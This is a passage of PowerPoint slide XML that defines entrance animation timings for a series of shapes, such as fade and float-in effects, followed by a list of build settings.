                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28675"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="62" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28684"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28684"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28684"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28684"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28684"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="68" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28686"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28686"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28686"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28686"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28686"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="74" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="75" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28674"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28674"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28674"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28674"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2867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0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28685"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28685"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28685"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28685"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28685"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="87" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28688"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28688"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28688"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28688"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28688"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="93" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28689"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="95" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28689"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="96" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28689"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28689"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28689"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="99" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="100" presetID="37" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="101" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28690"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28690"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28690"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28690"/>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8690"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.03"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="106" presetID="37" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="107" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28691"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28691"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28691"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="110" dur="900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28691"/>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8691"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.03"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="112" presetID="37" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="113" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28692"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="114" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28692"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="115" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28692"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="116" dur="900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28692"/>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2869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P spid="28675" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28676" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28677" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28678" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28679" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28680" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28682" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28683" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28684" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28685" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28686" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28687" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28688" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28689" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="28690" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
